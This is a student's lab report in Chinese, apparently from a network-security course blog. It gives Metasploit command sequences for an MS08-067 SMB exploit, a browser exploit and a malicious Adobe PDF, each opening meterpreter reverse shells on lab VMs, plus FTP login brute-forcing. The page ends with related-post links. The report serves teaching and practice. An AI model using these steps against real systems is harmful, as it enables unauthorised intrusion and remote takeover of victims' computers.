20155235 《网络攻防》 实验五 MSF基础应用

实验内容

  1. 一个主动攻击实践,如ms08_067; (1分)
  2. 一个针对浏览器的攻击,如ms11_050;(1分)
  3. 一个针对客户端的攻击,如Adobe;(1分)

  4. 成功应用任何一个辅助模块。(0.5分)

    实验一 主动攻击

  • 在kali的终端输入msfconsole,进入控制台
  • 输入use exploit/windows/smb/ms08_067_netapi
  • 输入set RHOST 192.168.129.134,为靶机IP
  • 输入set LHOST 192.168.129.133,为攻击者IP
  • 输入set target 0,设置目标

  • 最后输入exploit,开始攻击。

    实验结果:获取靶机权限

    实验二 针对浏览器的攻击

  • 在kali的终端输入msfconsole,进入控制台
  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader,获取并使用浏览器漏洞
  • 输入set payload windows/meterpreter/reverse_tcp, 选择反向链接载荷
  • 输入set SRVHOST 192.168.129.133,设置服务器主机IP
  • 输入set LHOST 192.168.129.133,设置攻击机的IP
  • 输入exploit,得到http://192.168.129.133:80/
  • 在靶机上访问http://192.168.129.133:80/,会弹出一个窗口
  • 同时攻击者电脑获取连接,输入sessions查看到反弹链接到主机的电脑

  • 输入sessions -i 2控制靶机

    实验三 针对客户端的攻击

  • 输入exploit/windows/fileformat/adobe_cooltype_sing,确定攻击方案
  • 输入set LHOST 192.168.129.133,设置攻击机的IP
  • 输入set LPORT 5235,设置攻击端口

  • 将生成的pdf传送到靶机上打开,同时在kali上开始监听

    实验四 应用一个辅助模块

  • 输入show auxiliary查看所有辅助模块
  • 使用scanner/http/dir_scanner扫描目录

  • 选择ftp_login,扫描192.168.3.44192.168.43.48五个中,使用用户名20151124(我随手瞎打的),密码为123456登陆的人



    实验结果:失算了!居然没有!

    问题

  1. 用自己的话解释什么是exploit,payload,encode.
    exploit就是利用啊,找到漏洞然后利用!
    payload载荷,就是个载体,让我们能把病毒放进去传到别人电脑里的载体
    encode加密,为了不让我们的病毒被检测到的加密方法

实验心得

从第四次试验开始,我就有了一个安内存条的想法,到这个实验,这个想法终于生根发芽了,我要安一个8G的内存条!!!!!不然虚拟机都打不开,不是搞笑呢吗!

20155235 《网络攻防》 实验五 MSF基础应用的更多相关文章

  1. 20155201 网络攻防技术 实验五 MSF基础应用

    20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...

  2. 20155328 网络攻防 实验五:MSF基础应用

    20155328 网络攻防 实验五:MSF基础应用 实践内容及过程记录 一.Windows服务渗透攻击----ms08_067 攻击机:kali 靶机:WindowsXP(英文版) 第一步,分别查看攻 ...

  3. 2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用

    2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块expl ...

  4. 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用

    20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...

  5. 20145236《网络攻防》Exp5 MSF基础应用

    20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...

  6. 20155226《网络攻防》 Exp5 MSF基础应用

    20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...

  7. 20155301 《网络攻防》 Exp5 MSF基础应用

    20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...

  8. 20155318 《网络攻防》Exp5 MSF基础应用

    20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...

  9. 20155321 《网络攻防》 Exp5 MSF基础应用

    20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...

随机推荐

  1. php 实现简单加入购物车(1)

          这个购物车相对来说比较简单,用于短暂存储,并没有存储到数据库,购物车对于爱网购的人来说简直是熟悉的不能再熟悉了,在写购物车之前,我们首先要构思一下,我们需要先从数据库中调出一张表格,这里我 ...

  2. SQLServer 学习笔记之超详细基础SQL语句 Part 11

    Sqlserver 学习笔记 by:授客 QQ:1033553122 -----------------------接Part 10------------------- DECLARE @myavg ...

  3. arm64 调试环境搭建及 ROP 实战

    前言 比赛的一个 arm 64 位的 pwn 题,通过这个题实践了 arm 64 下的 rop 以及调试环境搭建的方式. 题目文件 https://gitee.com/hac425/blog_data ...

  4. c++得到窗口句柄

    #include <Windows.h> #include <stdio.h> #include <tchar.h> #include <string.h&g ...

  5. 前端构建工具Gulp使用总结

    1.安装准备 1.1 Node.js安装 在安装Gulp之前首先的安装Node.js, 安装教程详见Node.js 安装配置 1.2 npm安装 在安装node的时候会自动安装npm模块管理器,详见n ...

  6. pycharm结合coding.net使用

    1,网上很多都是讲解pycharm结合github的,将pycharm的项目推送到github上. 现在很多博客都写了pycharm和github结合,其次,github同步时较慢,时而导致同步失败, ...

  7. 使用 Azure PowerShell 管理 Azure 虚拟网络和 Windows 虚拟机

    Azure 虚拟机使用 Azure 网络进行内部和外部网络通信. 本教程介绍了如何在虚拟网络中创建多个虚拟机 (VM),以及如何在虚拟机之间配置网络连接. 你将学习如何执行以下操作: 创建虚拟网络 创 ...

  8. 服务器重启可能会导致SQL Server中部分数据库变为single user mode

    今天检查公司生产服务器的SQL Server数据库,惊讶的发现有三个生产数据库变为了single user mode.奇怪的是没有任何人和程序执行过SQL语句将这三个数据库设置为single user ...

  9. EOFException异常详解

    最近线上的系统被检测出有错误日志,领导让我检查下问题,我就顺便了解了下这个异常. 了解一个类,当然是先去看他的API,EOFException的API如下: 通过这个API,我们可以得出以下信息: 这 ...

  10. [Linux|DBA]运维三十六计

    这里是腾讯两位大神梁定安.周小军总记得运维DBA三十六计--